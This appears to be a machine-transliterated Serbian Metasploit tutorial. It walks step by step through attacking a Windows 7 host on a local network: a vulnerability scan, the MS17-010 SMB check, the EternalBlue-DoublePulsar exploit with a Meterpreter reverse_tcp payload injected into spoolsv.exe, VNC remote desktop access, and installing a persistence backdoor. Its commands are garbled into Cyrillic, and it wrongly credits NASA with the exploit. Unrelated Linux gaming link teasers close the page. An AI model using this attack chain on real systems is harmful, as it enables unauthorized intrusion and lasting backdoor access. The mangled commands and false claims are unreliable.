метасплоит

Метасплоит Туториал

Метасплоит Туториал

Како смо разговарали о ТОП 25 НАЈБОЉИХ КАЛИ ЛИНУКС АЛАТА, и МЕТАСПЛОИТ смо ставили на прво место на листи, сада хајде да разговарамо и научимо о МЕТАСПЛОИТ-у. Препоручили бисмо вам да се упознате са Метасплоитом.

Метасплоит у почетку створио Х. Д Мооре 2003. године, док га Рапид7 није стекао и даље развијао 21. октобра 2009. Метасплоит-фрамеворк је у потпуности написан помоћу Руби-а и стандардни је пакет инсталиран у Кали Линук систему (а такође и скоро сви ОС за тестирање пенетрације, претпостављам). То је омиљени комплет хакера или тестера пенетрације за истраживање сигурносних рањивости, развој и извршавање експлоатација на циљевима и други сигурносни развој.

Метасплоит долази са неколико издања, углавном подељених у две категорије, бесплатну верзију и верзију која се плаћа. Бесплатне верзије: Метасплоит Фрамеворк Цоммунити Едитион (интерфејс заснован на ЦЛИ) и Армитаге (интерфејс заснован на ГУИ). Плаћене верзије: Метасплоит Екпресс, Метасплоит Про и Цобалт Стрике (слично је са Армитаге-ом, који обезбеђује Стратегиц Цибер ЛЛЦ).

Метасплоит омогућава корисницима да креирају (или развију) сопствени екплоит код, али не брините ако не знате како да кодирате, Метасплоит има толико модула и они се континуирано ажурирају. Тренутно Метасплоит има преко 1600 експлоатација и 500 корисних терета. Једноставан начин да се разуме шта су екплоити и корисни терети, екплоит је у основи како нападач испоручује корисни терет кроз рупу рањивости циљног система.  Једном када нападач покрене експлоатацију која садржи корисни терет против рањиве мете, а затим распоређени терет (корисни терет који се користи за поновно повезивање са нападачем ради добијања даљинског приступа против циљног система), у овој фази је експлоатација завршена и постаје небитна.

„Метасплоит није хакирајући инстант алат, то је сулуд оквир“

Овај чланак о Метасплоит-у говори о спровођењу испитивања пенетрације према циљном систему користећи следећи ток:


ПРИПРЕМА

Уверите се да наш Кали Линук има најновију ажурирану верзију. У оквиру сваког ажурирања биће побољшања. Покрените следеће команде:

~ # апт ажурирање
~ # апт надоградња -и
~ # апт дист-упграде -и

Једном када је наша машина ажурирана, сада почињемо пуштањем метасплоит конзоле. У терминалу унесите:

~ # мсфцонсоле

Такође вам је потребан било који уређивач текста, Гедит или Леафпад, који ће успут прикупити неке информације пре него што компајлирамо напад. Прво, идентификујте своју ИП адресу бежичног интерфејса, ИП рутера и мрежну маску.

На основу горе наведених информација, бележимо ВЛАН1 и ИП адресу рутера, као и мрежну маску. Дакле, белешка би требало да изгледа овако:

ИП нападача (ЛХОСТ): 192.168.1.56
ИП приступника / рутера: 192.168.1.1
Мрежна маска: 255.255.255.0 (/ 24)


КОРАК 1: СКЕНИРАЊЕ РАЊИВОСТИ

У метасплоит конзоли прво прикупљамо информације, попут циљне ИП адресе, оперативног система, отворених портова и рањивости. Метасплоит нам омогућава да покренемо НМап директно са конзоле. На основу горе наведених информација покрените ову команду да бисте извршили наш задатак прикупљања информација.

мсф> нмап -в 192.168.1.1/24 --скрипта вулн -Пн -О

Из наредбе изнад добили смо доњи резултат.

Добили смо рањиву мету која ради под оперативним системом Виндовс, а рањива је на услузи СМБв1. Дакле, додајте напомену.

Циљни ИП (РХОСТ): 192.168.1.57
Рањивост: Рањивост извршења удаљеног кода на Мицрософт СМБв1 серверима (мс17-010)


КОРАК 2: ПРОЦЕНА РАЊИВОСТИ

Сада знамо циљ и његову рањивост. Проверимо рањивост у метасплоит конзоли

Сада знамо циљ и његову рањивост. Проверимо рањивост у метасплоит конзоли помоћу помоћног модула смб_сцаннер. Покрените следећу команду:

мсф> користите помоћни / скенер / смб / смб_мс17_010
мсф помоћни (смб_мс17_010)> подеси РХОСТС [циљни ИП]
мсф помоћни (смб_мс17_010)> покрени

Метасплоит је сигуран у рањивост и показује тачно издање Виндовс ОС-а. Додај у напомену:

Циљни ОС: Виндовс 7 Ултимате 7600


КОРАК 3: ЕКСПЛОАТАЦИЈА

На несрећу, метасплоит нема експлоатациони модул повезан са овом рањивошћу. Не брините, напољу је изложен момак који је написао експлоатациони код. Екплоит је познат, јер га је покренула НАСА, зове се ЕтерналБлуе-ДоублеПулсар. Можете га преузети одавде или можете следити водич из видео снимка испод да бисте инсталирали експлоатациони код у свој метасплоит фрамеворк.

Након што следите горњи водич, (уверите се да је путања иста као у упутству). Сада сте спремни да искористите мету. Покрените следеће команде:

користите екплоит / виндовс / смб / фореверблуе_доублепулсар
подесите носивост виндовс / метерпретер / реверсе_тцп
сет ПРОЦЕССИЊЕЦТ споолсв.еке
сет РХОСТ 192.168.1.57
сет ЛХОСТ 192.168.1.56

Искористити

Бум ... Експлоатација је успела, имамо сесију метерпретера. Као што сам раније споменуо, након покретања екплоит-а распоредиће корисни терет, који је, овде смо користили, виндовс /метерпретер/ реверсе_тцп.


КОРАК 4: ДОБИЈАЊЕ ДАЉИНСКОГ ПРИСТУПА

Истражимо доступније наредбе, унесите '?'(без знака питања) и погледајте наведене расположиве команде. Тхе Стдапи, системске наредбе су:

Да бисте видели више информација о циљном систему, користите 'сисинфо'команда. Излаз би требао изгледати овако.

Пошто смо раније убризгали у системски процес (споолсв.еке), добили смо Систем Привилеге. Ми поседујемо мету. Много можемо учинити командом до циља. На пример, могли бисмо покренути РДП или једноставно подесити ВНЦ даљински. Да бисте покренули ВНЦ услугу, унесите наредбу:

~ # покрени внц

Резултат би требало да буде циљана радна површина машине, изгледа овако.

Најважнији део је креирање закулисног врата, па кад год се циљ одвоји од наше машине, циљни рачунар ће покушати да се поново повеже, опет са нама. Бацкдооринг се користи за одржавање приступа, то је попут риболова, нећете бацити рибу натраг у воду када је добијете? Желите да урадите нешто са рибом, било да је сачувате у фрижидеру за даље акције, попут кувања, или да је продате за новац.

Метерпретер има ову упорну функцију бацкдоор-а. Покрените следећу наредбу и погледајте доступне параметре и аргументе.

метерпретер> покренути упорност -х

Ако вам није пријатно са овом застарелом скриптом, налази се најновији модул постојаности пост / виндовс / манаге / персистенце_еке. Можете то даље истражити сами.

Метасплоит је огроман, није само алат, већ је оквир, узмите у обзир да има преко 1600 експлоатација и око 500 корисних терета. Један чланак управо одговара широкој слици опште употребе или идеје. Али, толико сте научили из овог чланка.

„Што више пратите ток напада више имате изазова без напора.”

Како користити АутоКеи за аутоматизацију Линук игара
АутоКеи је услужни програм за аутоматизацију радне површине за Линук и Кс11, програмиран на Питхон 3, ГТК и Кт. Користећи његову скриптну и МАЦРО функ...
Како приказати бројач ФПС-а у Линук играма
Линук гаминг добио је велики потицај када је Валве најавио Линук подршку за Стеам клијент и њихове игре 2012. године. Од тада су многе ААА и индие игр...
Како преузети и играти Сид Меиер'с Цивилизатион ВИ на Линук-у
Увод у игру Цивилизатион 6 је модерни поглед на класични концепт представљен у серији игара Аге оф Емпирес. Идеја је била прилично једноставна; започе...